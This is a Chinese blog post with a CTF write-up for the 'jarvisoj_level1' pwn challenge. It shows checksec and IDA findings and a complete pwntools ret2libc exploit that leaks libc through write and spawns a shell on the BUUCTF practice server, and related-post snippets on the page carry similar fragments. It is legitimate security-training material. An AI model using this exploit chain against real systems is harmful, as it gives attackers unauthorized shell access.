jarvisoj_level1

最新推荐文章于 2024-02-04 13:36:45 发布
最新推荐文章于 2024-02-04 13:36:45 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121694633
版权

jarvisoj_level1

使用checksec查看:
在这里插入图片描述
保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。

放进IDA中查看:
在这里插入图片描述
主函数中直接给出漏洞函数:
在这里插入图片描述
妥妥的一个栈溢出了,程序会输出buf的地址。

查看了下字符串也没有关键字符串,看来就是ret2shellcode

然而…BUU上的环境可能有点问题。并不能打通。

于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。

exp:

from pwn import *
from six import reraise

#start
r = remote("node4.buuoj.cn",27660)
# r = process("../buu/jarvisoj_level1")
elf = ELF("../buu/jarvisoj_level1")
libc = ELF("../buu/ubuntu16(32).so")

#params
main_addr = elf.symbols['main']
write_plt = elf.plt['write']
write_got = elf.got['write']

#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
# r.recv()
payload = b'M'*(0x88+4) + p32(system_addr) + p32(main_addr) +  p32(bin_sh_addr)
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis OJ level1
Kni9hT's Blog
11-08 576
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Jarvis OJ level1
九层台
07-06 760
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 143
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 335
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
Jarvis OJlevel1
weixin_43464124的博客
04-22 246
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
1. 初始化:定义初始的φ函数,通常是一个包围待分割对象的闭合曲线或曲面。 2. 定义速度场:根据特定的图像特征(如梯度、色彩、纹理等)和能量函数,计算φ函数应该移动的速度。 3. 求解Level Set方程:使用有限差...
Low_Level_IO
02-11
2020年计算机体系结构和汇编语言组合项目阅读Proj6_Morrowj2.asm以获得代码该程序获取10个带符号的32位整数,进行验证并将其从ASCII转换为SDWORD,然后在转换回ASCII以及求和和舍入平均后,显示SDWORDS数组。
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
1. “switching_angles_5_level.asv”、“switching_angles_5_level_final.asv”、“switching_angles_5_level_4_8_08.asv”、“switching_angles_5_level1.asv”:这些文件可能包含了不同版本的五电平逆变器开关角...
jarvisoj_level1-ret2libc
个人笔记
06-13 85
利用的是pwntool模板自动搜索泄露地址匹配的libc版本。思路:无binsh,无system,考虑ret2libc。
Jarvis OJ pwn——level1
CNS-Enterprise BCC-1701-J
05-27 135
Jarvis OJ 做题练习
[BUUCTF]PWN——jarvisoj_level1
BangSen1的博客
03-31 217
jarvisoj_level1 例行检查,32位,未开启任何保护。 运行一下,给了一个地址 0xffef96b0 用IDA打开,查看主函数 查看function函数。由此我们可以知道 bufadddr= 0xffef96b0, buf存在溢出漏洞。由于题目并没有开启任何保护。所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可获取shell。 ...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3534
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
jarvisoj_level01解题
最新发布
2301_81504456的博客
02-04 520
jarvisoj_level01解题思路,破译,编写脚本。
Jarvis OJ level1题解
educat0r的博客
02-19 550
题目网址https://www.jarvisoj.com/challenges Pwnlevel1题 首先把文件放入gdb中用checksec分析 分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执...
BUUCTF jarvisoj_level0 1
qq_56313338的博客
10-14 387
64位ubuntu18以上系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐。跳过了push rbp之后,rsp就少压栈了8字节,此时栈16位对齐。
BUUCTF刷题之路-jarvisoj_level01
qq_30528603的博客
05-27 211
看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。
jarvisoj_level0
zip471642048的博客
01-17 399
jarvisoj_level0 pwn的最简单的题目了,难的我是真不会了,说一下做题思路 首先拿到题目checksec检查一下开了什么东西 64位程序什么都没有开,太好了,开了东西就不会了~~。 ida64位查看shift+F12看一下,看到了、/bin/bash和system,然后就是Hello World 查看main函数 跟进vulnerable_function,很明显在这里发生溢出,buf的大小只有0x80但是缺接收了0x200导致溢出 gdb-peda调试程序,创建150用于溢出的字符串

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值